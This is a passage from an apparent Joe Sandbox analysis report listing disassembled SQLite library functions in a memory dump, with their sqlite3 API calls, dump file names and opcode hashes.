                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_result_doublesqlite3_result_error_code
                                                                                                    • String ID:
                                                                                                    • API String ID: 4229029058-0
                                                                                                    • Opcode ID: 86584a47da8e500b1dcaf0df671d88c90eb2c9e892bfc65889d83fea4dd30496
                                                                                                    • Instruction ID: dda409a0b185de4f7e9d3c04e76aa4724e6d69d2e622f360ab2831aa23a41e63
                                                                                                    • Opcode Fuzzy Hash: 86584a47da8e500b1dcaf0df671d88c90eb2c9e892bfc65889d83fea4dd30496
                                                                                                    • Instruction Fuzzy Hash: BFA107B0A08609DFCB10DF69C584A8EBBF1FF88314F218829E859D7364EB34D955CB81
                                                                                                    Function 61E1EFB8 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: localtimesqlite3_mutex_entersqlite3_mutex_leavesqlite3_result_error
                                                                                                    • String ID:
                                                                                                    • API String ID: 2374424446-0
                                                                                                    • Opcode ID: 016cc835ffb5f488df4ccf236e24334be4b942dd722fe4ffb13a4e3943df31b7
                                                                                                    • Instruction ID: 2df23402cc071f1674e13261d0cfef6249ad7036115f0c9bb529c2dc8a35432a
                                                                                                    • Opcode Fuzzy Hash: 016cc835ffb5f488df4ccf236e24334be4b942dd722fe4ffb13a4e3943df31b7
                                                                                                    • Instruction Fuzzy Hash: 24514B74D08359CFEB10CFA9C88479EBBF1AF45308F108599D488AB245D7759A85CF52
                                                                                                    Function 61E350A3 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E18F76: sqlite3_malloc.SQLITE3 ref: 61E18FA3
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E350CF
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 61E35102
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E3519A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_entersqlite3_stricmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 3567284914-0
                                                                                                    • Opcode ID: 8fdd50306659a6743ae53246b34fd425bb3f05571f7ba601d8b158910af4fbb7
                                                                                                    • Instruction ID: cb0245a8126ab04e0d4565786859c3d7671b8523ebb6cc02daf537ff478fdc50
                                                                                                    • Opcode Fuzzy Hash: 8fdd50306659a6743ae53246b34fd425bb3f05571f7ba601d8b158910af4fbb7
                                                                                                    • Instruction Fuzzy Hash: 1931F674A04A6A9FDB00DFA9C88469EBBF0FF89304F64C469D455A7310D73AE842CF91
                                                                                                    Function 61E2060F Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 61E2064B
                                                                                                      • Part of subcall function 61E18497: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E18178,?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E1849F
                                                                                                    • sqlite3_value_dup.SQLITE3 ref: 61E206A2
                                                                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E206D7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_initializesqlite3_mallocsqlite3_result_error_nomemsqlite3_value_dup
                                                                                                    • String ID:
                                                                                                    • API String ID: 405757302-0
                                                                                                    • Opcode ID: 9b56f850abe7653a8e4975c60da0087afb9901ac10748952334cb387cc73d809
                                                                                                    • Instruction ID: 8f73303b5dd6918f486ef27f5fc9d264efd15f31c3d6a367427cb05e7a980db9
                                                                                                    • Opcode Fuzzy Hash: 9b56f850abe7653a8e4975c60da0087afb9901ac10748952334cb387cc73d809
                                                                                                    • Instruction Fuzzy Hash: 0231D4B5E042198FCB10DFA9C58599EBBF0FB88314F15846AE858EB310D734E952CFA0
                                                                                                    Function 61E384ED Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_initialize.SQLITE3 ref: 61E384F9
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E17F65
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E2224D), ref: 61E17F99
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E182E4
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E38519
                                                                                                    • sqlite3_vfs_find.SQLITE3 ref: 61E38558
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E38657
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_vfs_find
                                                                                                    • String ID:
                                                                                                    • API String ID: 321126751-0
                                                                                                    • Opcode ID: 75f913a692ebbf3322899adf995a39d6d527309c5dcb481c6be6e0cb7d85c82a
                                                                                                    • Instruction ID: aa39cdd9b86109e2ca21f447c6fe64077844254f741ca312e365dad5f72f17c1
                                                                                                    • Opcode Fuzzy Hash: 75f913a692ebbf3322899adf995a39d6d527309c5dcb481c6be6e0cb7d85c82a
                                                                                                    • Instruction Fuzzy Hash: 02416E388182F8DEC7279B6885447D97FF0EF96728F1889DAD8C48B342C674C189DB51
                                                                                                    Function 61E50C46 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_snprintf$sqlite3_result_errorsqlite3_value_text
                                                                                                    • String ID:
                                                                                                    • API String ID: 2252562485-0
                                                                                                    • Opcode ID: 2a995baf9ea799b2c027598a2dac51f172a1810de91341bb32531ad618bdd50e
                                                                                                    • Instruction ID: ffd037f6e07576975daa33f9a144366cd64a138a7f33f08dd189ce681e79ce28
                                                                                                    • Opcode Fuzzy Hash: 2a995baf9ea799b2c027598a2dac51f172a1810de91341bb32531ad618bdd50e
                                                                                                    • Instruction Fuzzy Hash: DA3115B4A057089FD764CF68C480B4ABBF0BB89318F20C89EE49C87340D736E9908F42
                                                                                                    Function 61E52C19 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E52C4A
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E52C52
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E52C65
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                      • Part of subcall function 61E09D2A: sqlite3_free.SQLITE3 ref: 61E09D3F
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E52CA3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_mutex_enter
                                                                                                    • String ID:
                                                                                                    • API String ID: 3930042888-0
                                                                                                    • Opcode ID: 96e98b8956901f6b9b2a079876b3ba6faab719e37a02f0d546edafe197bc5e0a
                                                                                                    • Instruction ID: d3838116262026a2576d46da45916ac8ca94dce865288db080a8f2e10138453f
                                                                                                    • Opcode Fuzzy Hash: 96e98b8956901f6b9b2a079876b3ba6faab719e37a02f0d546edafe197bc5e0a
                                                                                                    • Instruction Fuzzy Hash: F421BD70A04607CBCB48DFF9C48065AB7F1BFA8314B35C529D819AB302E736D8618B90
                                                                                                    Function 61E143C1 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,-00000001,?,61E1450B), ref: 61E143EF
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,-00000001,?,61E1450B), ref: 61E14446
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,-00000001,?,61E1450B), ref: 61E14463
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,-00000001,?,61E1450B), ref: 61E1448A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1477753154-0
                                                                                                    • Opcode ID: 14d1f52052599e6e87cd15f8626e7d7449232861e5fd47ac855b7d0342c00947
                                                                                                    • Instruction ID: 8414b4b181cb129c6513d0de0f968458bb4277310e31e37fb9f3b457c601f75b
                                                                                                    • Opcode Fuzzy Hash: 14d1f52052599e6e87cd15f8626e7d7449232861e5fd47ac855b7d0342c00947
                                                                                                    • Instruction Fuzzy Hash: DD116D7965CA618FCF00AFB8C19161977F6BB4638DB24882BE544CB304D778D8928B52
                                                                                                    Function 61E24D95 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_stricmpsqlite3_value_text
                                                                                                    • String ID:
                                                                                                    • API String ID: 3779612131-0
                                                                                                    • Opcode ID: 51bfe0574f5018e4c5c3c7389dfb0f605030b59e5b1e22246a1608c3533ae4e8
                                                                                                    • Instruction ID: 9ed1560be681974ba9bf33d831e90ec066c50c17333a1ed0b9c81d882438538a
                                                                                                    • Opcode Fuzzy Hash: 51bfe0574f5018e4c5c3c7389dfb0f605030b59e5b1e22246a1608c3533ae4e8
                                                                                                    • Instruction Fuzzy Hash: 2A114F716047499BDB109F69C89529ABBA0FB48334F24C62AF9688F780D334D551CB91
                                                                                                    Function 61E12FE8 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E12FFA
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E13048
                                                                                                      • Part of subcall function 61E10406: sqlite3_mutex_enter.SQLITE3 ref: 61E10445
                                                                                                      • Part of subcall function 61E10406: sqlite3_mutex_leave.SQLITE3 ref: 61E104ED
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E1306C
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E1308D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1477753154-0
                                                                                                    • Opcode ID: 2033adb37c03a6018db83bb2d30fb59c042848445298035b96ae5ec3f664ccb0
                                                                                                    • Instruction ID: 86bf3e2f7d39f2492dd2b7459389fd2d71b1b89993e6ff619c0031f20feeb8ce
                                                                                                    • Opcode Fuzzy Hash: 2033adb37c03a6018db83bb2d30fb59c042848445298035b96ae5ec3f664ccb0
                                                                                                    • Instruction Fuzzy Hash: A3115EB8718B518BEB00EFB8C5C261977E5B786319F24892EE484CB309D775E8C18B52
                                                                                                    Function 61E37F9A Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E37FEC
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E38006
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E3800E
                                                                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E38018
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_error_nomem
                                                                                                    • String ID:
                                                                                                    • API String ID: 3282944778-0
                                                                                                    • Opcode ID: 83f06fa11a10496968ac0b5c231d65013cdb30151e9c6c1c95c6259f9df7b5ba
                                                                                                    • Instruction ID: e625cb65426cb0b0d6cb01cb5bdeba0cf8e59a092c4cad8ff250daa883f46644
                                                                                                    • Opcode Fuzzy Hash: 83f06fa11a10496968ac0b5c231d65013cdb30151e9c6c1c95c6259f9df7b5ba
                                                                                                    • Instruction Fuzzy Hash: 9E018E748087568BE7109F65C44065EFBF4AFC8324F20C62DE8A887340E734C582DF92
                                                                                                    Function 61E87979 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_initialize.SQLITE3 ref: 61E87985
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E17F65
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E2224D), ref: 61E17F99
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E182E4
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E8799F
                                                                                                    • sqlite3_realloc64.SQLITE3 ref: 61E879D4
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E879FC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_realloc64
                                                                                                    • String ID:
                                                                                                    • API String ID: 1177761455-0
                                                                                                    • Opcode ID: 250c329ef8e76b69484ec08b9b6e51eeecade9024af33afd30ced76282e184eb
                                                                                                    • Instruction ID: e9907a13dd7bc320fb7b109543e343aafe50b94c4c1de274449ade6f7aa882ad
                                                                                                    • Opcode Fuzzy Hash: 250c329ef8e76b69484ec08b9b6e51eeecade9024af33afd30ced76282e184eb
                                                                                                    • Instruction Fuzzy Hash: B6017574B086519BD7009FA9C44171D7BE5FB8A398F29893DD988CB310E735D492C751
                                                                                                    Function 61E88A10 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __dllonexit_lock_onexit_unlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 209411981-0
                                                                                                    • Opcode ID: 894d3fe4a5c13fcbdc955af075f664c8fb64ba095e162ff47891a0e4a8fa562b
